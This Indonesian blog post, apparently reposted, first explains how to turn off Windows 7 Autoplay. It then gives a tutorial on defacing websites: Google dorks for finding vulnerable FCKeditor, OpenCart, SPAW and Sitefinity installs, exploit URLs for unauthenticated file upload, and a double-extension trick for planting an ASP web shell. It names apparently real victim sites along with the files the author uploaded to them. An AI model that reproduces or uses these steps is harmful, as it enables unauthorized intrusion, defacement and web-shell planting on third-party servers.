Cara Me-nonaktifkan Autoplay/Autorun pd Win7

Autoplay/autorun adalah salah satu fitur windows yang berfungsi untuk membuka file yang berada di media data (CD/Hardisk Eksternal/Flashdisk,dll) secara otomatis. Ada beberapa kelemahan jika menggunakan/mengaktifkan fitur ini, yaitu:

1. Jika CD/Hardisk Eksternal/Flashdisk mengandung virus maka virus dapat dengan mudah menyerang komputer anda melalui fitur autorun/autoplay windows 7,
2. Windows 7 akan mengalokasikan memori untuk fitur autorun/autoplay, sehingga bisa menguras memori komputer anda.

Kita bisa menonaktifkan (disable) fitur autorun/autoplay windows 7. Berikut ini adalah cara untuk menonaktifkan atau mematikan fitur autorun/autoplay windows 7:

1. Masuk Control Panel,
2. Pilih Hardware and Sound,
3. Pilih Autoplay,
4. Lepaskan/hilangkan centang pada "Use Autoplay for all media devices",
5. Terakhir klik tombol Save.

Deface code

1. Defacing ASPX

Langsung buka omm google, masukkan dork inurl:Fck/fcklinkgallery.aspx atau /portals/0/inurl:tabid/176/Default.aspx. Lalu saya ambil salah satu contoh web yg vuln http://www.primeplasticsinc.net/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx dan akan tampil halaman seperti ini. Link type nya kita ubah ke file (a file in your site).

 

Lalu ubah URL nya menjadi javascript:__doPostBack(‘ctlURL$cmdUpload’,” ). Maka tampil command choose file, lalu masukkan file anda dan upload.

Note: ekstensi file yang dapat di upload yaitu  ( *. swf, *.jpg, *.jpeg, *.jpe, *.gif, *.bmp, *.png, *.doc, *.xls, *.ppt, *.pdf, *.txt, *.xml, *.xsl, *.css, *.zip )

Untuk melihat hasilnya maka tambahkan public_html/portals/0/file_kamu. Maka akan seperti ini http://www.primeplasticsinc.net/portals/0/hack.txt tidak sulit kan ??

2. Defacing OpenCart

Buka google, masukkan dork  Powered By OpenCart site:.com atau SUPPORT BY OPENCART

Saya mendapatkan target www.centaurguitar.com/storefront2/ lalu kita masukkan exploitnya admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html. Jadi alamatnya akan seperti ini www.centaurguitar.com/storefront2/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html dan akan muncul halaman website seperti ini

 

Ok langsung saja upload file kita, jika berhasil maka akan muncul message box “File uploaded with no errors” dan hasilnya seperti ini http://www.centaurguitar.com/hacked.html

3.    Defacing SPAW

Buka google, masukkan dork nya inurl:spaw2/dialogs/ atau inurl:spaw2/uploads/files/

Contoh targetnya seperti ini http://www.demariahoeve.nl/cms/spaw2/dialogs/dialog.php lalu perhatikan gambar ini

 

URL yang saya blog hapus dan diganti spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2 &lang=es&charset=&scid=cf73b58bb51c52235494da75 2d9 8cac9

Maka akan alamat URL nya akan seperti ini http://www.demariahoeve.nl/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%20&lang=es&charset=&scid=cf73b58bb51c52235494da75%202d9%208cac9 dan muncul pilihan upload, tinggal upload saja file nya. Dan hasilnya seperti ini http://www.demariahoeve.nl/cms/spaw2/uploads/files/hacked.txt

4.   Defacing Sitefinity CMS (ASP.NET) Shell Upload Vulnerability

Dork : “Sitefinity: Login”

Exploit : UserControls/Dialogs/ImageEditorDialog.aspx

Cari targetnya sama seperti cara diatas. Contoh targetnya http://www.hoac-bsa.org/sitefinity/ lalu masukkan exploitnya sehingga seperti ini http://www.hoac-bsa.org/sitefinity/UserControls/Dialogs/ImageEditorDialog.aspx lalu sekarang kita tinggal upload sheelnya, dalam ASP.NET file yang dapat diupload adalah JPG, contoh : (namashell.asp;.jpg) atau (namashell.asp;.gif). Jika sudah diupload, maka cara untuk menampilkan shell kita dengan mengklik “view original size” dan hasilnya seperti ini http://www.hoac-bsa.org/Images/hacked.asp;.jpg

Mungkin segitu aja yang bisa saya share, jadi kesimpulannya deface itu mudah bukan??


sumber : http://adhie70.wordpress.com/